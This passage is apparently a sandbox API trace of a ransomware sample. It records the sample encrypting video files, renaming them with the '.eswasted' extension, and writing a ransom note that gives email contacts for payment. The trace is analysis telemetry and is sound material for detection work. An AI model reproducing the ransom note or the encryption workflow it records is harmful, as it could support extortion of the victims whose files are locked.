CloseHandle (hObject=0xfc) returned 1 [0082.390] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.391] CloseHandle (hObject=0xf8) returned 1 [0082.391] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.391] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.392] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.392] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.392] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.392] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.392] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.401] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.401] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.401] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.401] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cRjENvUNj6jb+jx1EFBgE/u5r/5F5HM8ZknCNbqncLUNkwze/lTN/E6C0aeoONWS\r\ntfHATwAOWnrAtVqmODPXZkJ0A9o6WU/D1o/XVNbUCVEmCCDUInH4KeByunF56Fbn\r\nQao90wOWVg0XNgp9ihuih+vcLBvo1iNyA4x+5+qB73BiQLra/BVjiI05t2Tr90l9\r\nzT+YH3R/Q2NXKmmvRmZByM76/k0KsLd1IJJbzUAfffADsXJsMd9k3l/qFU6XNe+S\r\n0ESyV2tpEhmEskciasshnK3OYmnowu2uvdOhBf4MZEjqcrZMgqpJ4UEZ5Yy4zKj3\r\nLy8cjVJqNPunTMFU0SAhnjHKvsx6cjPmv8DMb75BckkOwk3EKQ8kDBaVHxRArZWC\r\nXpcuskJ8KekWfTMqirTX/ND6pokRN1yGXpDrXlZNl4AZzqvHDLLzSN1UC9xkwJ2p\r\nLpdvLHCHxd7ac8xL4Mgjz19WRwDVwyFMf4RqExeAeGUm0/29ubEcqYb8cf9XWww5\r\nK5gfbERkZZhZgbHQqaEYXQ3ebAFjlDrRdyThP7Htfc9Icci31/LXrRhPTTmLJE7o\r\n02hMDRbaeEmHpPtGZcRKgp8KtvpzBVC94QJhKjQ0ihK82hGRRPnsK3GM8M/nadbJ\r\nllZeuPk5bMWHR/c2dlbd9Y6JURirl80P9IcV3X87nsY=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.401] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.401] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.401] SetEndOfFile (hFile=0x100) returned 1 [0082.403] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.403] CloseHandle (hObject=0x100) returned 1 [0082.405] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef700 | out: hHeap=0x4a0000) returned 1 [0082.405] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5828 | out: hHeap=0x4a0000) returned 1 [0082.405] _aulldvrm () returned 0x0 [0082.405] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.406] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.406] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ClnaHrmkOEpNYNcDQ.avi") returned 76 [0082.406] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ef700 [0082.406] lstrcpyW (in: lpString1=0x4ef798, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.406] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.406] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.407] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.407] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ClnaHrmkOEpNYNcDQ.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\clnahrmkoepnyncdq.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.408] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.409] SetEndOfFile (hFile=0x100) returned 1 [0082.409] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.409] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.409] lstrcpyW (in: lpString1=0x4ef798, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ClnaHrmkOEpNYNcDQ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\clnahrmkoepnyncdq.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ClnaHrmkOEpNYNcDQ.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\clnahrmkoepnyncdq.avi.eswasted")) returned 1 [0082.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ClnaHrmkOEpNYNcDQ.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\clnahrmkoepnyncdq.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.410] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.410] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x820e [0082.410] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820e) returned 0x2d0000 [0082.410] CloseHandle (hObject=0xf8) returned 1 [0082.553] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.554] CloseHandle (hObject=0xfc) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.554] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.554] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.554] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.554] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.555] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.555] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.563] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.563] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.563] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.563] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qLWXrf90vLZ6Y16NoevdZ8G+LseG14EEAdM6AFxm2GkYSvTre4OarjanjyrHYkCI\r\n6P8dyE8KBXmq9aj9RFD7TivccAgheLhOmBGo5s6E7yLWsxRbKcRkScXq2NrwGyCQ\r\nPQIaPCDJhwEoNMi/iullTPksoieTlbge5h9Nu/mFbsDTvLq/qthQpochCfPtpGS5\r\nM47nBE8lPP48qGqghPPP1qYA5lvQZuEav2OS3kJZ1gE+2dlyJoe5sHgCLsdntaDd\r\n6TafjHmrv5gNluVphYZa9VvNd3wukEsvFUyvOJs4TEJOGUdfZMKd3QWp4Vz7gxV4\r\npHbWtKAF6L/a0A20W/E+wxOcAo43Zif+24kVsQ114Ssh1EBilFjug++0jrbC4z8U\r\n43Dg6bUFmR2Tm9PXqzvIOoG51P2/BL5QsmP0qPBqmG0fS1AXrJRmPktrgBaJu5mY\r\nBuuAvjxhWZeXAZ0YrWm2+DYvNteeTIiXxv9hpk+ku4SGBYpriOorgbtDbjkimHkW\r\nCXN1PK0kQixIVoogE26ds9jKqMJhio6jaksjnh1yA463JcjBAHokGjyB3c4r7Mh3\r\n3JUbCKOhDrHcoWqHXZViOLPjTlUCXEpH1sDA8VeP2m72vVu87XWMlGYU8HMCQpCb\r\nJXA2oFfMapBk5OSi0/DQvlne0RUJLqaPHDTpEuYKnTc=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.563] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.563] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.564] SetEndOfFile (hFile=0x100) returned 1 [0082.566] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.566] CloseHandle (hObject=0x100) returned 1 [0082.567] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef700 | out: hHeap=0x4a0000) returned 1 [0082.567] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5920 | out: hHeap=0x4a0000) returned 1 [0082.567] _aulldvrm () returned 0x0 [0082.568] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.568] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.568] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\iyFaF0GQE--oiIK.swf") returned 74 [0082.568] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29e) returned 0x4cb4e0 [0082.568] lstrcpyW (in: lpString1=0x4cb574, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.568] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.569] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.569] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.569] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\iyFaF0GQE--oiIK.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\iyfaf0gqe--oiik.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.580] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.581] SetEndOfFile (hFile=0x100) returned 1 [0082.581] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.581] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.581] lstrcpyW (in: lpString1=0x4cb574, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\iyFaF0GQE--oiIK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\iyfaf0gqe--oiik.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\iyFaF0GQE--oiIK.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\iyfaf0gqe--oiik.swf.eswasted")) returned 1 [0082.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\iyFaF0GQE--oiIK.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\iyfaf0gqe--oiik.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.582] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.582] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x7874 [0082.582] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7874) returned 0x2d0000 [0082.582] CloseHandle (hObject=0xfc) returned 1 [0082.585] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.585] CloseHandle (hObject=0xf8) returned 1 [0082.585] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.585] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.586] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.586] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.586] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.587] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.587] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.595] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ef440 [0082.595] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.595] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.595] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]IbyIkWsf/QVIvLw1+nKxNENmsBk5g5G+2GWK830hU2jkHyjIDVMUbeL7OYtZppN1\r\nJWCy+pEpFrIy4lZDEZ5WDS1KldQEGcyUXBAq8GsYw8lSlWVPJe5kRVdYjQZCVt8t\r\nMP+Q8LBbj+eQkjQhMGh0j91yYiIKLz4hT7YHXKvrkCfZDg8gxzlgkXOzgPAQZrEY\r\nnoBN8JUFLRaBX753lZdHyWT24+FtaWg1iZBptY9mmUWm/awO96yenaYv1zaub5fw\r\nCSlFG4b7bUVP/C91yd/HA3FslnyYkfF6poGx38Lm++sDx4qHoZyaHbJsMhBLQGFw\r\n8tkDG11tLc63GFz8/zuFW8jYYuOjuZREqP0p8I9hkmnutGCkCUtztEC/lDXCQ6tl\r\nogP+PblVvLPgKmhNDElK9Kb8KflZYf0PB4JGoZYlFZljz9s+1cmNGm5Px3oh0k3/\r\n4BQ1aaUcdPwkFxCrhQFPwOjqgmsekv3Ey4tHkc0tO7s6NMhCQSknl2Wxh8vhY768\r\nDdaK4K6D/HUAy0W789CyL026sfw/rzxnB7mnxce/1smTb4CfbWUe+DGlEq8ymKpr\r\nwlb363rOsj9KpEKCjlgi8O6FTG6jkUZEhTsh7laddweWOZmCPuoXQfRgsRNrl2GZ\r\nxEuuaMGqq5WJLuV/+Xun07xmbvMwIGEVlyWFNTWk/b2=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.595] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.595] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.595] SetEndOfFile (hFile=0x100) returned 1 [0082.597] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.597] CloseHandle (hObject=0x100) returned 1 [0082.630] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb4e0 | out: hHeap=0x4a0000) returned 1 [0082.630] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efab8 | out: hHeap=0x4a0000) returned 1 [0082.630] _aulldvrm () returned 0x0 [0082.630] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.631] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.631] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.631] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\OT1Ldr6YdgBKqU.mp4") returned 73 [0082.631] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29c) returned 0x4cb4e0 [0082.631] lstrcpyW (in: lpString1=0x4cb572, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.631] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.631] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.632] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.632] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\OT1Ldr6YdgBKqU.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ot1ldr6ydgbkqu.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.633] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.634] SetEndOfFile (hFile=0x100) returned 1 [0082.634] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.634] lstrcpyW (in: lpString1=0x4cb572, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\OT1Ldr6YdgBKqU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ot1ldr6ydgbkqu.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\OT1Ldr6YdgBKqU.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ot1ldr6ydgbkqu.mp4.eswasted")) returned 1 [0082.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\OT1Ldr6YdgBKqU.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ot1ldr6ydgbkqu.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.635] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.635] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x609a [0082.635] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x609a) returned 0x2d0000 [0082.635] CloseHandle (hObject=0xfc) returned 1 [0082.638] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.638] CloseHandle (hObject=0xf8) returned 1 [0082.638] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.638] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.639] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.639] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.639] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.640] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.640] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.648] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.648] 